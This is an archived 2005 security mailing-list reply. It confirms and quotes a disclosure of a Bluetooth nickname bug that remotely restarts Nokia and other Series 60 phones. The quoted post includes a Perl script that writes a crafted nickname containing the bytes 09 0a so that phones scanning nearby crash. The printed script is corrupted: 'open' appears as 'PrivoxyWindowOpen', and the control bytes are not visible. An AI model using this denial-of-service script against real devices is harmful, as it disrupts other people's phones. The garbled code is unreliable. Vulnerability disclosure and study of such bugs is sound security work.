Re: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart

From: Alex Renn Jr. (ray_at_TXnet.com)
Date: 06/27/05

  • Next message: NGSSoftware Insight Security Research: "High Risk Vulnerability in RealPlayer for Windows" 
    Date: Mon, 27 Jun 2005 20:43:57 +0300
To: Qnix@bsdmail.org

    Hello Qnix@bsdmail.org!

    Not only Nokia Bluetooth devices are affected.
    It seems that all Series60 phones have this bug, including all firmware versions
    of Siemens SX1.

    ====[ End of message ]====

        Best Regards,
        Alex Renn Jr.
        ray@TXnet.com

    ===[ Original Message ]===

    From: Qnix@bsdmail.org <Qnix@bsdmail.org>
    To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
    Subject: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart
    Date: 27.06.2005 11:55

    > When i was playing with my bluetooth device,
    > i found that if you add in your nickname " 09 0a " in hex, it will cause that
    > every one who search for available bluetooth devices and find your nickname his
    > nokia phone will restart.
    > you should add a nicname like that,

    > [something][09 0a in hex][just add anything here]

    > you should add anything before 09 0a because the nokia phones think that its
    > a space at the end, and it will auto deleted so you should add any thing before
    > 090a .

    > nokia-bt-cx.pl
    > -------------start---------------
    > #!/usr/bin/perl -w

    > my $btnick;
    > my $bth;
    > my $bts;
    > my $file;
    > $bth = " .";
    > print "\n*******************************************************\n";
    > print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
    > print "** BY QNIX | Q-nix[@]bsdmail[dot]org **\n";
    > print "*******************************************************\n";
    > print " \n write your nickname : ";
    > $btnick = <STDIN>;
    > chomp($btnick);
    > print " \n OUTPUT : ";
    > $file = <STDIN>;
    > chomp($file);
    > PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";
    > $bts = "$btnick$bth";
    > print BLUEN ("$bts");
    > close(BLUEN);
     
    > print "\n Done !! , send the output to your nokia and copy the file to the bluetooth nickname space . \n\n";
    > -------------end-----------------

    > may be someone got more information about that bug or any thing else.
    > and maybe someone can develop that problem.

    ===[ End of Original Message ]===

  • Next message: NGSSoftware Insight Security Research: "High Risk Vulnerability in RealPlayer for Windows"